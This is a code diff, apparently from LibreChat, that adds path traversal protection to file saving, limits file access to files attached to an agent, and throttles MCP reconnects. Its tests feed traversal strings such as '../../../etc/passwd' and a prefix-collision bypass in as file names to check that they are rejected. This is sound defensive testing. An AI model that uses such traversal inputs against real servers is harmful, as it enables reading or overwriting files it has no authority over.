const makePrimaryConfig = (edges) => ({
id: PRIMARY_ID,
endpoint: 'agents',
edges,
toolDefinitions: [],
toolRegistry: new Map(),
userMCPAuthMap: null,
tool_resources: {},
resendFiles: true,
maxContextTokens: 4096,
});
it('should skip handoff agent and filter its edge when user lacks VIEW access', async () => {
await createAgent({
id: TARGET_ID,
name: 'Target Agent',
provider: 'openai',
model: 'gpt-4',
author: new mongoose.Types.ObjectId(),
tools: [],
});
const edges = [{ from: PRIMARY_ID, to: TARGET_ID, edgeType: 'handoff' }];
mockInitializeAgent.mockResolvedValue(makePrimaryConfig(edges));
await initializeClient({
req: makeReq(),
res: {},
signal: new AbortController().signal,
endpointOption: makeEndpointOption(),
});
expect(mockInitializeAgent).toHaveBeenCalledTimes(1);
expect(agentClientArgs.agent.edges).toEqual([]);
});
it('should initialize handoff agent and keep its edge when user has VIEW access', async () => {
const authorizedAgent = await createAgent({
id: AUTHORIZED_ID,
name: 'Authorized Agent',
provider: 'openai',
model: 'gpt-4',
author: new mongoose.Types.ObjectId(),
tools: [],
});
await AclEntry.create({
principalType: PrincipalType.USER,
principalId: testUser._id,
principalModel: PrincipalModel.USER,
resourceType: ResourceType.AGENT,
resourceId: authorizedAgent._id,
permBits: PermissionBits.VIEW,
grantedBy: testUser._id,
});
const edges = [{ from: PRIMARY_ID, to: AUTHORIZED_ID, edgeType: 'handoff' }];
const handoffConfig = {
id: AUTHORIZED_ID,
edges: [],
toolDefinitions: [],
toolRegistry: new Map(),
userMCPAuthMap: null,
tool_resources: {},
};
let callCount = 0;
mockInitializeAgent.mockImplementation(() => {
callCount++;
return callCount === 1
? Promise.resolve(makePrimaryConfig(edges))
: Promise.resolve(handoffConfig);
});
await initializeClient({
req: makeReq(),
res: {},
signal: new AbortController().signal,
endpointOption: makeEndpointOption(),
});
expect(mockInitializeAgent).toHaveBeenCalledTimes(2);
expect(agentClientArgs.agent.edges).toHaveLength(1);
expect(agentClientArgs.agent.edges[0].to).toBe(AUTHORIZED_ID);
});
});

View file

@ -0,0 +1,124 @@
jest.mock('uuid', () => ({ v4: jest.fn(() => 'mock-uuid') }));
jest.mock('@librechat/data-schemas', () => ({
logger: { warn: jest.fn(), debug: jest.fn(), error: jest.fn() },
}));
jest.mock('@librechat/agents', () => ({
getCodeBaseURL: jest.fn(() => 'http://localhost:8000'),
}));
const mockSanitizeFilename = jest.fn();
jest.mock('@librechat/api', () => ({
logAxiosError: jest.fn(),
getBasePath: jest.fn(() => ''),
sanitizeFilename: mockSanitizeFilename,
}));
jest.mock('librechat-data-provider', () => ({
...jest.requireActual('librechat-data-provider'),
mergeFileConfig: jest.fn(() => ({ serverFileSizeLimit: 100 * 1024 * 1024 })),
getEndpointFileConfig: jest.fn(() => ({
fileSizeLimit: 100 * 1024 * 1024,
supportedMimeTypes: ['*/*'],
})),
fileConfig: { checkType: jest.fn(() => true) },
}));
jest.mock('~/models', () => ({
createFile: jest.fn().mockResolvedValue({}),
getFiles: jest.fn().mockResolvedValue([]),
updateFile: jest.fn(),
claimCodeFile: jest.fn().mockResolvedValue({ file_id: 'mock-uuid', usage: 0 }),
}));
const mockSaveBuffer = jest.fn().mockResolvedValue('/uploads/user123/mock-uuid__output.csv');
jest.mock('~/server/services/Files/strategies', () => ({
getStrategyFunctions: jest.fn(() => ({
saveBuffer: mockSaveBuffer,
})),
}));
jest.mock('~/server/services/Files/permissions', () => ({
filterFilesByAgentAccess: jest.fn().mockResolvedValue([]),
}));
jest.mock('~/server/services/Files/images/convert', () => ({
convertImage: jest.fn(),
}));
jest.mock('~/server/utils', () => ({
determineFileType: jest.fn().mockResolvedValue({ mime: 'text/csv' }),
}));
jest.mock('axios', () =>
jest.fn().mockResolvedValue({
data: Buffer.from('file-content'),
}),
);
const { createFile } = require('~/models');
const { processCodeOutput } = require('../process');
const baseParams = {
req: {
user: { id: 'user123' },
config: {
fileStrategy: 'local',
imageOutputType: 'webp',
fileConfig: {},
},
},
id: 'code-file-id',
apiKey: 'test-key',
toolCallId: 'tool-1',
conversationId: 'conv-1',
messageId: 'msg-1',
session_id: 'session-1',
};
describe('processCodeOutput path traversal protection', () => {
beforeEach(() => {
jest.clearAllMocks();
});
test('sanitizeFilename is called with the raw artifact name', async () => {
mockSanitizeFilename.mockReturnValueOnce('output.csv');
await processCodeOutput({ ...baseParams, name: 'output.csv' });
expect(mockSanitizeFilename).toHaveBeenCalledWith('output.csv');
});
test('sanitized name is used in saveBuffer fileName', async () => {
mockSanitizeFilename.mockReturnValueOnce('sanitized-name.txt');
await processCodeOutput({ ...baseParams, name: '../../../tmp/poc.txt' });
expect(mockSanitizeFilename).toHaveBeenCalledWith('../../../tmp/poc.txt');
const call = mockSaveBuffer.mock.calls[0][0];
expect(call.fileName).toBe('mock-uuid__sanitized-name.txt');
});
test('sanitized name is stored as filename in the file record', async () => {
mockSanitizeFilename.mockReturnValueOnce('safe-output.csv');
await processCodeOutput({ ...baseParams, name: 'unsafe/../../output.csv' });
const fileArg = createFile.mock.calls[0][0];
expect(fileArg.filename).toBe('safe-output.csv');
});
test('sanitized name is used for image file records', async () => {
const { convertImage } = require('~/server/services/Files/images/convert');
convertImage.mockResolvedValueOnce({
filepath: '/images/user123/mock-uuid.webp',
bytes: 100,
});
mockSanitizeFilename.mockReturnValueOnce('safe-chart.png');
await processCodeOutput({ ...baseParams, name: '../../../chart.png' });
expect(mockSanitizeFilename).toHaveBeenCalledWith('../../../chart.png');
const fileArg = createFile.mock.calls[0][0];
expect(fileArg.filename).toBe('safe-chart.png');
});
});

View file

@ -3,7 +3,7 @@ const { v4 } = require('uuid');
const axios = require('axios'); const axios = require('axios');
const { logger } = require('@librechat/data-schemas'); const { logger } = require('@librechat/data-schemas');
const { getCodeBaseURL } = require('@librechat/agents'); const { getCodeBaseURL } = require('@librechat/agents');
const { logAxiosError, getBasePath } = require('@librechat/api'); const { logAxiosError, getBasePath, sanitizeFilename } = require('@librechat/api');
const { const {
Tools, Tools,
megabyte, megabyte,
@ -146,6 +146,13 @@ const processCodeOutput = async ({
); );
} }
const safeName = sanitizeFilename(name);
if (safeName !== name) {
logger.warn(
`[processCodeOutput] Filename sanitized: "${name}" -> "${safeName}" | conv=${conversationId}`,
);
}
if (isImage) { if (isImage) {
const usage = isUpdate ? (claimed.usage ?? 0) + 1 : 1; const usage = isUpdate ? (claimed.usage ?? 0) + 1 : 1;
const _file = await convertImage(req, buffer, 'high', `${file_id}${fileExt}`); const _file = await convertImage(req, buffer, 'high', `${file_id}${fileExt}`);
@ -156,7 +163,7 @@ const processCodeOutput = async ({
file_id, file_id,
messageId, messageId,
usage, usage,
filename: name, filename: safeName,
conversationId, conversationId,
user: req.user.id, user: req.user.id,
type: `image/${appConfig.imageOutputType}`, type: `image/${appConfig.imageOutputType}`,
@ -200,7 +207,7 @@ const processCodeOutput = async ({
); );
} }
const fileName = `${file_id}__${name}`; const fileName = `${file_id}__${safeName}`;
const filepath = await saveBuffer({ const filepath = await saveBuffer({
userId: req.user.id, userId: req.user.id,
buffer, buffer,
@ -213,7 +220,7 @@ const processCodeOutput = async ({
filepath, filepath,
messageId, messageId,
object: 'file', object: 'file',
filename: name, filename: safeName,
type: mimeType, type: mimeType,
conversationId, conversationId,
user: req.user.id, user: req.user.id,
@ -229,6 +236,11 @@ const processCodeOutput = async ({
await createFile(file, true); await createFile(file, true);
return Object.assign(file, { messageId, toolCallId }); return Object.assign(file, { messageId, toolCallId });
} catch (error) { } catch (error) {
if (error?.message === 'Path traversal detected in filename') {
logger.warn(
`[processCodeOutput] Path traversal blocked for file "${name}" | conv=${conversationId}`,
);
}
logAxiosError({ logAxiosError({
message: 'Error downloading/processing code environment file', message: 'Error downloading/processing code environment file',
error, error,

View file

@ -58,6 +58,7 @@ jest.mock('@librechat/agents', () => ({
jest.mock('@librechat/api', () => ({ jest.mock('@librechat/api', () => ({
logAxiosError: jest.fn(), logAxiosError: jest.fn(),
getBasePath: jest.fn(() => ''), getBasePath: jest.fn(() => ''),
sanitizeFilename: jest.fn((name) => name),
})); }));
// Mock models // Mock models

View file

@ -0,0 +1,69 @@
jest.mock('@librechat/api', () => ({ deleteRagFile: jest.fn() }));
jest.mock('@librechat/data-schemas', () => ({
logger: { warn: jest.fn(), error: jest.fn() },
}));
const mockTmpBase = require('fs').mkdtempSync(
require('path').join(require('os').tmpdir(), 'crud-traversal-'),
);
jest.mock('~/config/paths', () => {
const path = require('path');
return {
publicPath: path.join(mockTmpBase, 'public'),
uploads: path.join(mockTmpBase, 'uploads'),
};
});
const fs = require('fs');
const path = require('path');
const { saveLocalBuffer } = require('../crud');
describe('saveLocalBuffer path containment', () => {
beforeAll(() => {
fs.mkdirSync(path.join(mockTmpBase, 'public', 'images'), { recursive: true });
fs.mkdirSync(path.join(mockTmpBase, 'uploads'), { recursive: true });
});
afterAll(() => {
fs.rmSync(mockTmpBase, { recursive: true, force: true });
});
test('rejects filenames with path traversal sequences', async () => {
await expect(
saveLocalBuffer({
userId: 'user1',
buffer: Buffer.from('malicious'),
fileName: '../../../etc/passwd',
basePath: 'uploads',
}),
).rejects.toThrow('Path traversal detected in filename');
});
test('rejects prefix-collision traversal (startsWith bypass)', async () => {
fs.mkdirSync(path.join(mockTmpBase, 'uploads', 'user10'), { recursive: true });
await expect(
saveLocalBuffer({
userId: 'user1',
buffer: Buffer.from('malicious'),
fileName: '../user10/evil',
basePath: 'uploads',
}),
).rejects.toThrow('Path traversal detected in filename');
});
test('allows normal filenames', async () => {
const result = await saveLocalBuffer({
userId: 'user1',
buffer: Buffer.from('safe content'),
fileName: 'file-id__output.csv',
basePath: 'uploads',
});
expect(result).toBe('/uploads/user1/file-id__output.csv');
const filePath = path.join(mockTmpBase, 'uploads', 'user1', 'file-id__output.csv');
expect(fs.existsSync(filePath)).toBe(true);
fs.unlinkSync(filePath);
});
});

View file

@ -78,7 +78,13 @@ async function saveLocalBuffer({ userId, buffer, fileName, basePath = 'images' }
fs.mkdirSync(directoryPath, { recursive: true }); fs.mkdirSync(directoryPath, { recursive: true });
} }
fs.writeFileSync(path.join(directoryPath, fileName), buffer); const resolvedDir = path.resolve(directoryPath);
const resolvedPath = path.resolve(resolvedDir, fileName);
const rel = path.relative(resolvedDir, resolvedPath);
if (rel.startsWith('..') || path.isAbsolute(rel) || rel.includes(`..${path.sep}`)) {
throw new Error('Path traversal detected in filename');
}
fs.writeFileSync(resolvedPath, buffer);
const filePath = path.posix.join('/', basePath, userId, fileName); const filePath = path.posix.join('/', basePath, userId, fileName);
@ -165,9 +171,8 @@ async function getLocalFileURL({ fileName, basePath = 'images' }) {
} }
/** /**
* Validates if a given filepath is within a specified subdirectory under a base path. This function constructs * Validates that a filepath is strictly contained within a subdirectory under a base path,
* the expected base path using the base, subfolder, and user id from the request, and then checks if the * using path.relative to prevent prefix-collision bypasses.
* provided filepath starts with this constructed base path.
* *
* @param {ServerRequest} req - The request object from Express. It should contain a `user` property with an `id`. * @param {ServerRequest} req - The request object from Express. It should contain a `user` property with an `id`.
* @param {string} base - The base directory path. * @param {string} base - The base directory path.
@ -180,7 +185,8 @@ async function getLocalFileURL({ fileName, basePath = 'images' }) {
const isValidPath = (req, base, subfolder, filepath) => { const isValidPath = (req, base, subfolder, filepath) => {
const normalizedBase = path.resolve(base, subfolder, req.user.id); const normalizedBase = path.resolve(base, subfolder, req.user.id);
const normalizedFilepath = path.resolve(filepath); const normalizedFilepath = path.resolve(filepath);
return normalizedFilepath.startsWith(normalizedBase); const rel = path.relative(normalizedBase, normalizedFilepath);
return !rel.startsWith('..') && !path.isAbsolute(rel) && !rel.includes(`..${path.sep}`);
}; };
/** /**

View file

@ -1,10 +1,29 @@
const { logger } = require('@librechat/data-schemas'); const { logger } = require('@librechat/data-schemas');
const { PermissionBits, ResourceType } = require('librechat-data-provider'); const { PermissionBits, ResourceType, isEphemeralAgentId } = require('librechat-data-provider');
const { checkPermission } = require('~/server/services/PermissionService'); const { checkPermission } = require('~/server/services/PermissionService');
const { getAgent } = require('~/models/Agent'); const { getAgent } = require('~/models/Agent');
/** /**
* Checks if a user has access to multiple files through a shared agent (batch operation) * @param {Object} agent - The agent document (lean)
* @returns {Set<string>} All file IDs attached across all resource types
*/
function getAttachedFileIds(agent) {
const attachedFileIds = new Set();
if (agent.tool_resources) {
for (const resource of Object.values(agent.tool_resources)) {
if (resource?.file_ids && Array.isArray(resource.file_ids)) {
for (const fileId of resource.file_ids) {
attachedFileIds.add(fileId);
}
}
}
}
return attachedFileIds;
}
/**
* Checks if a user has access to multiple files through a shared agent (batch operation).
* Access is always scoped to files actually attached to the agent's tool_resources.
* @param {Object} params - Parameters object * @param {Object} params - Parameters object
* @param {string} params.userId - The user ID to check access for * @param {string} params.userId - The user ID to check access for
* @param {string} [params.role] - Optional user role to avoid DB query * @param {string} [params.role] - Optional user role to avoid DB query
@ -16,7 +35,6 @@ const { getAgent } = require('~/models/Agent');
const hasAccessToFilesViaAgent = async ({ userId, role, fileIds, agentId, isDelete }) => { const hasAccessToFilesViaAgent = async ({ userId, role, fileIds, agentId, isDelete }) => {
const accessMap = new Map(); const accessMap = new Map();
// Initialize all files as no access
fileIds.forEach((fileId) => accessMap.set(fileId, false)); fileIds.forEach((fileId) => accessMap.set(fileId, false));
try { try {
@ -26,13 +44,17 @@ const hasAccessToFilesViaAgent = async ({ userId, role, fileIds, agentId, isDele
return accessMap; return accessMap;
} }
// Check if user is the author - if so, grant access to all files const attachedFileIds = getAttachedFileIds(agent);
if (agent.author.toString() === userId.toString()) { if (agent.author.toString() === userId.toString()) {
fileIds.forEach((fileId) => accessMap.set(fileId, true)); fileIds.forEach((fileId) => {
if (attachedFileIds.has(fileId)) {
accessMap.set(fileId, true);
}
});
return accessMap; return accessMap;
} }
// Check if user has at least VIEW permission on the agent
const hasViewPermission = await checkPermission({ const hasViewPermission = await checkPermission({
userId, userId,
role, role,
@ -46,7 +68,6 @@ const hasAccessToFilesViaAgent = async ({ userId, role, fileIds, agentId, isDele
} }
if (isDelete) { if (isDelete) {
// Check if user has EDIT permission (which would indicate collaborative access)
const hasEditPermission = await checkPermission({ const hasEditPermission = await checkPermission({
userId, userId,
role, role,
@ -55,23 +76,11 @@ const hasAccessToFilesViaAgent = async ({ userId, role, fileIds, agentId, isDele
requiredPermission: PermissionBits.EDIT, requiredPermission: PermissionBits.EDIT,
}); });
// If user only has VIEW permission, they can't access files
// Only users with EDIT permission or higher can access agent files
if (!hasEditPermission) { if (!hasEditPermission) {
return accessMap; return accessMap;
} }
} }
const attachedFileIds = new Set();
if (agent.tool_resources) {
for (const [_resourceType, resource] of Object.entries(agent.tool_resources)) {
if (resource?.file_ids && Array.isArray(resource.file_ids)) {
resource.file_ids.forEach((fileId) => attachedFileIds.add(fileId));
}
}
}
// Grant access only to files that are attached to this agent
fileIds.forEach((fileId) => { fileIds.forEach((fileId) => {
if (attachedFileIds.has(fileId)) { if (attachedFileIds.has(fileId)) {
accessMap.set(fileId, true); accessMap.set(fileId, true);
@ -95,7 +104,7 @@ const hasAccessToFilesViaAgent = async ({ userId, role, fileIds, agentId, isDele
* @returns {Promise<Array<MongoFile>>} Filtered array of accessible files * @returns {Promise<Array<MongoFile>>} Filtered array of accessible files
*/ */
const filterFilesByAgentAccess = async ({ files, userId, role, agentId }) => { const filterFilesByAgentAccess = async ({ files, userId, role, agentId }) => {
if (!userId || !agentId || !files || files.length === 0) { if (!userId || !agentId || !files || files.length === 0 || isEphemeralAgentId(agentId)) {
return files; return files;
} }

View file

@ -0,0 +1,409 @@
jest.mock('@librechat/data-schemas', () => ({
logger: { error: jest.fn() },
}));
jest.mock('~/server/services/PermissionService', () => ({
checkPermission: jest.fn(),
}));
jest.mock('~/models/Agent', () => ({
getAgent: jest.fn(),
}));
const { logger } = require('@librechat/data-schemas');
const { Constants, PermissionBits, ResourceType } = require('librechat-data-provider');
const { checkPermission } = require('~/server/services/PermissionService');
const { getAgent } = require('~/models/Agent');
const { filterFilesByAgentAccess, hasAccessToFilesViaAgent } = require('./permissions');
const AUTHOR_ID = 'author-user-id';
const USER_ID = 'viewer-user-id';
const AGENT_ID = 'agent_test-abc123';
const AGENT_MONGO_ID = 'mongo-agent-id';
function makeFile(file_id, user) {
return { file_id, user, filename: `${file_id}.txt` };
}
function makeAgent(overrides = {}) {
return {
_id: AGENT_MONGO_ID,
id: AGENT_ID,
author: AUTHOR_ID,
tool_resources: {
file_search: { file_ids: ['attached-1', 'attached-2'] },
execute_code: { file_ids: ['attached-3'] },
},
...overrides,
};
}
beforeEach(() => {
jest.clearAllMocks();
});
describe('filterFilesByAgentAccess', () => {
describe('early returns (no DB calls)', () => {
it('should return files unfiltered for ephemeral agentId', async () => {
const files = [makeFile('f1', 'other-user')];
const result = await filterFilesByAgentAccess({
files,
userId: USER_ID,
agentId: Constants.EPHEMERAL_AGENT_ID,
});
expect(result).toBe(files);
expect(getAgent).not.toHaveBeenCalled();
});
it('should return files unfiltered for non-agent_ prefixed agentId', async () => {
const files = [makeFile('f1', 'other-user')];
const result = await filterFilesByAgentAccess({
files,
userId: USER_ID,
agentId: 'custom-memory-id',
});
expect(result).toBe(files);
expect(getAgent).not.toHaveBeenCalled();
});
it('should return files when userId is missing', async () => {
const files = [makeFile('f1', 'someone')];
const result = await filterFilesByAgentAccess({
files,
userId: undefined,
agentId: AGENT_ID,
});
expect(result).toBe(files);
expect(getAgent).not.toHaveBeenCalled();
});
it('should return files when agentId is missing', async () => {
const files = [makeFile('f1', 'someone')];
const result = await filterFilesByAgentAccess({
files,
userId: USER_ID,
agentId: undefined,
});
expect(result).toBe(files);
expect(getAgent).not.toHaveBeenCalled();
});
it('should return empty array when files is empty', async () => {
const result = await filterFilesByAgentAccess({
files: [],
userId: USER_ID,
agentId: AGENT_ID,
});
expect(result).toEqual([]);
expect(getAgent).not.toHaveBeenCalled();
});
it('should return undefined when files is nullish', async () => {
const result = await filterFilesByAgentAccess({
files: null,
userId: USER_ID,
agentId: AGENT_ID,
});
expect(result).toBeNull();
expect(getAgent).not.toHaveBeenCalled();
});
});
describe('all files owned by userId', () => {
it('should return all files without calling getAgent', async () => {
const files = [makeFile('f1', USER_ID), makeFile('f2', USER_ID)];
const result = await filterFilesByAgentAccess({
files,
userId: USER_ID,
agentId: AGENT_ID,
});
expect(result).toEqual(files);
expect(getAgent).not.toHaveBeenCalled();
});
});
describe('mixed owned and non-owned files', () => {
const ownedFile = makeFile('owned-1', USER_ID);
const sharedFile = makeFile('attached-1', AUTHOR_ID);
const unattachedFile = makeFile('not-attached', AUTHOR_ID);
it('should return owned + accessible non-owned files when user has VIEW', async () => {
getAgent.mockResolvedValue(makeAgent());
checkPermission.mockResolvedValue(true);
const result = await filterFilesByAgentAccess({
files: [ownedFile, sharedFile, unattachedFile],
userId: USER_ID,
role: 'USER',
agentId: AGENT_ID,
});
expect(result).toHaveLength(2);
expect(result.map((f) => f.file_id)).toContain('owned-1');
expect(result.map((f) => f.file_id)).toContain('attached-1');
expect(result.map((f) => f.file_id)).not.toContain('not-attached');
});
it('should return only owned files when user lacks VIEW permission', async () => {
getAgent.mockResolvedValue(makeAgent());
checkPermission.mockResolvedValue(false);
const result = await filterFilesByAgentAccess({
files: [ownedFile, sharedFile],
userId: USER_ID,
role: 'USER',
agentId: AGENT_ID,
});
expect(result).toEqual([ownedFile]);
});
it('should return only owned files when agent is not found', async () => {
getAgent.mockResolvedValue(null);
const result = await filterFilesByAgentAccess({
files: [ownedFile, sharedFile],
userId: USER_ID,
agentId: AGENT_ID,
});
expect(result).toEqual([ownedFile]);
});
it('should return only owned files on DB error (fail-closed)', async () => {
getAgent.mockRejectedValue(new Error('DB connection lost'));
const result = await filterFilesByAgentAccess({
files: [ownedFile, sharedFile],
userId: USER_ID,
agentId: AGENT_ID,
});
expect(result).toEqual([ownedFile]);
expect(logger.error).toHaveBeenCalled();
});
});
describe('file with no user field', () => {
it('should treat file as non-owned and run through access check', async () => {
const noUserFile = makeFile('attached-1', undefined);
getAgent.mockResolvedValue(makeAgent());
checkPermission.mockResolvedValue(true);
const result = await filterFilesByAgentAccess({
files: [noUserFile],
userId: USER_ID,
role: 'USER',
agentId: AGENT_ID,
});
expect(getAgent).toHaveBeenCalled();
expect(result).toEqual([noUserFile]);
});
it('should exclude file with no user field when not attached to agent', async () => {
const noUserFile = makeFile('not-attached', null);
getAgent.mockResolvedValue(makeAgent());
checkPermission.mockResolvedValue(true);
const result = await filterFilesByAgentAccess({
files: [noUserFile],
userId: USER_ID,
role: 'USER',
agentId: AGENT_ID,
});
expect(result).toEqual([]);
});
});
describe('no owned files (all non-owned)', () => {
const file1 = makeFile('attached-1', AUTHOR_ID);
const file2 = makeFile('not-attached', AUTHOR_ID);
it('should return only attached files when user has VIEW', async () => {
getAgent.mockResolvedValue(makeAgent());
checkPermission.mockResolvedValue(true);
const result = await filterFilesByAgentAccess({
files: [file1, file2],
userId: USER_ID,
role: 'USER',
agentId: AGENT_ID,
});
expect(result).toEqual([file1]);
});
it('should return empty array when no VIEW permission', async () => {
getAgent.mockResolvedValue(makeAgent());
checkPermission.mockResolvedValue(false);
const result = await filterFilesByAgentAccess({
files: [file1, file2],
userId: USER_ID,
agentId: AGENT_ID,
});
expect(result).toEqual([]);
});
it('should return empty array when agent not found', async () => {
getAgent.mockResolvedValue(null);
const result = await filterFilesByAgentAccess({
files: [file1],
userId: USER_ID,
agentId: AGENT_ID,
});
expect(result).toEqual([]);
});
});
});
describe('hasAccessToFilesViaAgent', () => {
describe('agent not found', () => {
it('should return all-false map', async () => {
getAgent.mockResolvedValue(null);
const result = await hasAccessToFilesViaAgent({
userId: USER_ID,
fileIds: ['f1', 'f2'],
agentId: AGENT_ID,
});
expect(result.get('f1')).toBe(false);
expect(result.get('f2')).toBe(false);
});
});
describe('author path', () => {
it('should grant access to attached files for the agent author', async () => {
getAgent.mockResolvedValue(makeAgent());
const result = await hasAccessToFilesViaAgent({
userId: AUTHOR_ID,
fileIds: ['attached-1', 'not-attached'],
agentId: AGENT_ID,
});
expect(result.get('attached-1')).toBe(true);
expect(result.get('not-attached')).toBe(false);
expect(checkPermission).not.toHaveBeenCalled();
});
});
describe('VIEW permission path', () => {
it('should grant access to attached files for viewer with VIEW permission', async () => {
getAgent.mockResolvedValue(makeAgent());
checkPermission.mockResolvedValue(true);
const result = await hasAccessToFilesViaAgent({
userId: USER_ID,
role: 'USER',
fileIds: ['attached-1', 'attached-3', 'not-attached'],
agentId: AGENT_ID,
});
expect(result.get('attached-1')).toBe(true);
expect(result.get('attached-3')).toBe(true);
expect(result.get('not-attached')).toBe(false);
expect(checkPermission).toHaveBeenCalledWith({
userId: USER_ID,
role: 'USER',
resourceType: ResourceType.AGENT,
resourceId: AGENT_MONGO_ID,
requiredPermission: PermissionBits.VIEW,
});
});
it('should deny all when VIEW permission is missing', async () => {
getAgent.mockResolvedValue(makeAgent());
checkPermission.mockResolvedValue(false);
const result = await hasAccessToFilesViaAgent({
userId: USER_ID,
fileIds: ['attached-1'],
agentId: AGENT_ID,
});
expect(result.get('attached-1')).toBe(false);
});
});
describe('delete path (EDIT permission required)', () => {
it('should grant access when both VIEW and EDIT pass', async () => {
getAgent.mockResolvedValue(makeAgent());
checkPermission.mockResolvedValueOnce(true).mockResolvedValueOnce(true);
const result = await hasAccessToFilesViaAgent({
userId: USER_ID,
fileIds: ['attached-1'],
agentId: AGENT_ID,
isDelete: true,
});
expect(result.get('attached-1')).toBe(true);
expect(checkPermission).toHaveBeenCalledTimes(2);
expect(checkPermission).toHaveBeenLastCalledWith(
expect.objectContaining({ requiredPermission: PermissionBits.EDIT }),
);
});
it('should deny all when VIEW passes but EDIT fails', async () => {
getAgent.mockResolvedValue(makeAgent());
checkPermission.mockResolvedValueOnce(true).mockResolvedValueOnce(false);
const result = await hasAccessToFilesViaAgent({
userId: USER_ID,
fileIds: ['attached-1'],
agentId: AGENT_ID,
isDelete: true,
});
expect(result.get('attached-1')).toBe(false);
});
});
describe('error handling', () => {
it('should return all-false map on DB error (fail-closed)', async () => {
getAgent.mockRejectedValue(new Error('connection refused'));
const result = await hasAccessToFilesViaAgent({
userId: USER_ID,
fileIds: ['f1', 'f2'],
agentId: AGENT_ID,
});
expect(result.get('f1')).toBe(false);
expect(result.get('f2')).toBe(false);
expect(logger.error).toHaveBeenCalledWith(
'[hasAccessToFilesViaAgent] Error checking file access:',
expect.any(Error),
);
});
});
describe('agent with no tool_resources', () => {
it('should deny all files even for the author', async () => {
getAgent.mockResolvedValue(makeAgent({ tool_resources: undefined }));
const result = await hasAccessToFilesViaAgent({
userId: AUTHOR_ID,
fileIds: ['f1'],
agentId: AGENT_ID,
});
expect(result.get('f1')).toBe(false);
});
});
});

View file

@ -34,6 +34,55 @@ const { reinitMCPServer } = require('./Tools/mcp');
const { getAppConfig } = require('./Config'); const { getAppConfig } = require('./Config');
const { getLogStores } = require('~/cache'); const { getLogStores } = require('~/cache');
const MAX_CACHE_SIZE = 1000;
const lastReconnectAttempts = new Map();
const RECONNECT_THROTTLE_MS = 10_000;
const missingToolCache = new Map();
const MISSING_TOOL_TTL_MS = 10_000;
function evictStale(map, ttl) {
if (map.size <= MAX_CACHE_SIZE) {
return;
}
const now = Date.now();
for (const [key, timestamp] of map) {
if (now - timestamp >= ttl) {
map.delete(key);
}
if (map.size <= MAX_CACHE_SIZE) {
return;
}
}
}
const unavailableMsg =
"This tool's MCP server is temporarily unavailable. Please try again shortly.";
/**
* @param {string} toolName
* @param {string} serverName
*/
function createUnavailableToolStub(toolName, serverName) {
const normalizedToolKey = `${toolName}${Constants.mcp_delimiter}${normalizeServerName(serverName)}`;
const _call = async () => [unavailableMsg, null];
const toolInstance = tool(_call, {
schema: {
type: 'object',
properties: {
input: { type: 'string', description: 'Input for the tool' },
},
required: [],
},
name: normalizedToolKey,
description: unavailableMsg,
responseFormat: AgentConstants.CONTENT_AND_ARTIFACT,
});
toolInstance.mcp = true;
toolInstance.mcpRawServerName = serverName;
return toolInstance;
}
function isEmptyObjectSchema(jsonSchema) { function isEmptyObjectSchema(jsonSchema) {
return ( return (
jsonSchema != null && jsonSchema != null &&
@ -211,6 +260,17 @@ async function reconnectServer({
logger.debug( logger.debug(
`[MCP][reconnectServer] serverName: ${serverName}, user: ${user?.id}, hasUserMCPAuthMap: ${!!userMCPAuthMap}`, `[MCP][reconnectServer] serverName: ${serverName}, user: ${user?.id}, hasUserMCPAuthMap: ${!!userMCPAuthMap}`,
); );
const throttleKey = `${user.id}:${serverName}`;
const now = Date.now();
const lastAttempt = lastReconnectAttempts.get(throttleKey) ?? 0;
if (now - lastAttempt < RECONNECT_THROTTLE_MS) {
logger.debug(`[MCP][reconnectServer] Throttled reconnect for ${serverName}`);
return null;
}
lastReconnectAttempts.set(throttleKey, now);
evictStale(lastReconnectAttempts, RECONNECT_THROTTLE_MS);
const runId = Constants.USE_PRELIM_RESPONSE_MESSAGE_ID; const runId = Constants.USE_PRELIM_RESPONSE_MESSAGE_ID;
const flowId = `${user.id}:${serverName}:${Date.now()}`; const flowId = `${user.id}:${serverName}:${Date.now()}`;
const flowManager = getFlowStateManager(getLogStores(CacheKeys.FLOWS)); const flowManager = getFlowStateManager(getLogStores(CacheKeys.FLOWS));
@ -267,7 +327,7 @@ async function reconnectServer({
userMCPAuthMap, userMCPAuthMap,
forceNew: true, forceNew: true,
returnOnOAuth: false, returnOnOAuth: false,
connectionTimeout: Time.TWO_MINUTES, connectionTimeout: Time.THIRTY_SECONDS,
}); });
} finally { } finally {
// Clean up abort handler to prevent memory leaks // Clean up abort handler to prevent memory leaks
@ -330,9 +390,13 @@ async function createMCPTools({
userMCPAuthMap, userMCPAuthMap,
streamId, streamId,
}); });
if (result === null) {
logger.debug(`[MCP][${serverName}] Reconnect throttled, skipping tool creation.`);
return [];
}
if (!result || !result.tools) { if (!result || !result.tools) {
logger.warn(`[MCP][${serverName}] Failed to reinitialize MCP server.`); logger.warn(`[MCP][${serverName}] Failed to reinitialize MCP server.`);
return; return [];
} }
const serverTools = []; const serverTools = [];
@ -402,6 +466,14 @@ async function createMCPTool({
/** @type {LCTool | undefined} */ /** @type {LCTool | undefined} */
let toolDefinition = availableTools?.[toolKey]?.function; let toolDefinition = availableTools?.[toolKey]?.function;
if (!toolDefinition) { if (!toolDefinition) {
const cachedAt = missingToolCache.get(toolKey);
if (cachedAt && Date.now() - cachedAt < MISSING_TOOL_TTL_MS) {
logger.debug(
`[MCP][${serverName}][${toolName}] Tool in negative cache, returning unavailable stub.`,
);
return createUnavailableToolStub(toolName, serverName);
}
logger.warn( logger.warn(
`[MCP][${serverName}][${toolName}] Requested tool not found in available tools, re-initializing MCP server.`, `[MCP][${serverName}][${toolName}] Requested tool not found in available tools, re-initializing MCP server.`,
); );
@ -415,11 +487,18 @@ async function createMCPTool({
streamId, streamId,
}); });
toolDefinition = result?.availableTools?.[toolKey]?.function; toolDefinition = result?.availableTools?.[toolKey]?.function;
if (!toolDefinition) {
missingToolCache.set(toolKey, Date.now());
evictStale(missingToolCache, MISSING_TOOL_TTL_MS);
}
} }
if (!toolDefinition) { if (!toolDefinition) {
logger.warn(`[MCP][${serverName}][${toolName}] Tool definition not found, cannot create tool.`); logger.warn(
return; `[MCP][${serverName}][${toolName}] Tool definition not found, returning unavailable stub.`,
);
return createUnavailableToolStub(toolName, serverName);
} }
return createToolInstance({ return createToolInstance({
@ -720,4 +799,5 @@ module.exports = {
getMCPSetupData, getMCPSetupData,
checkOAuthFlowStatus, checkOAuthFlowStatus,
getServerConnectionStatus, getServerConnectionStatus,
createUnavailableToolStub,
}; };

View file

@ -45,6 +45,7 @@ const {
getMCPSetupData, getMCPSetupData,
